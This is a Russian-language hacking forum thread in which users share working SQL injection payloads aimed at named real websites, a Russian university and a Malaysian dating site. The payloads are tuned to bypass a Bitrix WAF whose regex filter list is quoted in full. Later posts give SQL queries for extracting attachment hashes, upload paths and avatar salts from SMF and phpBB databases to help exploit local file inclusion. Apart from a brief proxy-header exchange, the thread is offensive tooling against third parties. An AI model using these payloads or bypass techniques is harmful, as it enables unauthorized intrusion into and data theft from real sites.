Вопросы по уязвимостям

[Pirotexnik]

Спасибо. Пичаль.

[12309]

Untitled,
у тебя на сервере апач висит на 80 порту, а траф на него идёт с другого сервера. чтобы видеть реальные ip юзеров нужно поставить mod_rpaf и добавить ип того сервера (123.12.1.123) в конфиг rpaf'а

[Kribrum]

12309,
Я могу ошибиться, но это может оказаться неверным решением, если система разбита на несколько серверов например (frontend)/(backend). На front'e - статика и картинки, на back'e - динамика. Обращения юзеров идут на front, а там стоит какой-нить nginx, у которого просто указан proxy_pass на back'end. В таком случае rpaf ничего нужного не покажет. Или нет?

[kingbeef]

Цитата:

Сообщение от Pirotexnik

http://www.bsu.edu.ru/mc/faculty.php?id=1&type=8+and(/*+++select+select+++*/+select+1+from(select+count(*),concat((select+@@ve rsion),floor(rand(0)*2))x+from+information_schema. tables+group+by+x)a)--+g

Фильтр все равно.

[BlackFan]

Цитата:

Сообщение от kingbeef

Фильтр все равно.

?id=1&type=8,information_schema.tables+where+table _schema+not+like+'info%'+group+by+concat(table_nam e,rand(0)|0)+having+min(0)+limit+0,1+--+-

?type=8+union%23%0aselect+1,2,3,table_name,5,6,7,8 ,9,10/*&id=*/from+information_schema.tables

[12309]

> а там стоит какой-нить nginx, у которого просто указан proxy_pass на back'end

надо попробовать. думаю, энжынкс по дефолту передаёт хедер x-forwarded-for.
рпаф еще определённый хедер читает, его тоже можно в конфиге указать. например, x-real-ip вместо x-forwarded-for

[Pirotexnik]

2BlackFan, ай хорош. Особенно первый вариант.
Как-то забыл я, что можно вообще без юнионов обойтись)

[Untitled]

Цитата:

Сообщение от BlackFan

?id=1&type=8,information_schema.tables+where+table _schema+not+like+'info%'+group+by+concat(table_nam e,rand(0)|0)+having+min(0)+limit+0,1+--+-

Шикарно, не сообразил.
К слову, скрипт работает через битриксовые файлы (от туда и WAF, скорее всего).

Вдогонку - сам фильтр:

PHP код:

        $sql_space = "(?:[\\x00-\\x20\(\)\'\"\`]|(?:\\/\\*.*?\\*\\/)|(?:--.*?[\\n\\r])|(\\/\\*!)|(\\*\\/))+";
        if(!$this->_sql_filters)
        {
            $this->_sql_filters = array(
                "/(uni)(on{$sql_space}.+{$sql_space}sel)(ect)/is" => "\\1{$char}\\2{$char}\\3",
                "/(uni)(on{$sql_space}sel)(ect)/is" => "\\1{$char}\\2{$char}\\3",

                "/(sel)(ect{$sql_space}.+{$sql_space}fr)(om)/is" => "\\1{$char}\\2{$char}\\3",
                "/(fr)(om{$sql_space}.+{$sql_space}wh)(ere)/is" => "\\1{$char}\\2{$char}\\3",

                "/(alt)(er)({$sql_space})(database|table|function|procedure|server|event|view|index)/is" => "\\1{$char}\\2\\3\\4",
                "/(cre)(ate)({$sql_space})(database|table|function|procedure|server|event|view|index)/is" => "\\1{$char}\\2\\3\\4",
                "/(dr)(op)({$sql_space})(database|table|function|procedure|server|event|view|index)/is" => "\\1{$char}\\2\\3\\4",

                "/(upd)(ate{$sql_space}.+{$sql_space}se)(t)/is" => "\\1{$char}\\2{$char}\\3",
                "/(ins)(ert{$sql_space}.+{$sql_space}val)(ue)/is" => "\\1{$char}\\2{$char}\\3",
                "/(ins)(ert{$sql_space}.+{$sql_space}se)(t)/is" => "\\1{$char}\\2{$char}\\3",
                "/(i)(nto{$sql_space}out)(file)/is" => "\\1{$char}\\2{$char}\\3",
                "/(i)(nto{$sql_space}dump)(file)/is" => "\\1{$char}\\2{$char}\\3",

                "/(ins)(ert{$sql_space}.+{$sql_space}sele)(ct)/is" => "\\1{$char}\\2{$char}\\3",
                "/(ins)(ert{$sql_space}in)(to)/is" => "\\1{$char}\\2{$char}\\3",
                "/(ins)(ert{$sql_space}.+{$sql_space}in)(to)/is" => "\\1{$char}\\2{$char}\\3",


                "/(load_)(file\\()/is" => "\\1{$char}\\2",

                "/({$sql_space}[sx]p)(_\w+\()/" => "\\1{$char}\\2",

                "/(ex)(ec\()/"=>"\\1{$char}\\2",

                "/(fr)(om.+lim)(it)/is" => "\\1{$char}\\2{$char}\\3",

                "/(ben)(chmark\\()/is" => "\\1{$char}\\2",
                "/(sl)(eep\\()/is" => "\\1{$char}\\2",
                "/(us)(er\\()/is" => "\\1{$char}\\2",
                "/(ver)(sion\\()/is" => "\\1{$char}\\2",
                "/(dat)(abase\\()/is" => "\\1{$char}\\2",
                "/(sche)(ma\\()/is" => "\\1{$char}\\2",
                "/(sub)(string\\()/is" => "\\1{$char}\\2",
            ); 


[durito]

http://www.dating21.com/matrimonials/index.asp?ctry=Malaysia&id=149&st=Selangor&ct=Kual a%20Lumpur%27+or+1=@@version--

а вот вывести данные из любой таблицы не получается

[Untitled]

Движки часто скрывают путь к залитым файлам и отдают их содержимое через скрипты, что очень неудобно при LFI.

SMF 2.x (по-моему, только 2ая ветка):

Код:

/%ATTACHMENTS_PATH%/%ATTACH_ID%_%FILE_HASH%

PHP код:

$file_hash = sha1(md5($filename . time()) . mt_rand()); 


ATTACH_ID берется, очевидно, из ссылки, FILE_HASH нужно выдергивать из базы:

Код:

SELECT+file_hash+FROM+smf_attachments+WHERE+id_attach=ATTACH_ID+LIMIT+0,1

ATTACHMENTS_PATH

Код:

SELECT+value+FROM+smf_settings+WHERE+variable=0x6174746163686d656e7455706c6f6164446972+LIMIT+0,1

По умолчанию: /attachments/. Также там может быть несколько путей, тогда надо дополнительно вытаскивать id_folder из smf_attachments.

В 1.х ветке (во всех ли?) аватарка загружалась просто как:

Код:

/%ATTACHMENTS_PATH%/avatar_%USER_ID%.jpg

phpBB 3.x

Код:

/%AVATAR_PATH%/%SALT%_%USER_ID%.jpg

SALT нужно выдергивать из базы:

Код:

SELECT+config_value+FROM+phpbb_config+WHERE+config_name='avatar_salt'+LIMIT+0,1

AVATAR_PATH:

Код:

SELECT+config_value+FROM+phpbb_config+WHERE+config_name='avatar_path'+LIMIT+0,1

По умолчанию: /images/avatars/upload/

С аттачами аналогично, подробнее в functions_upload.php, функция clean_filename().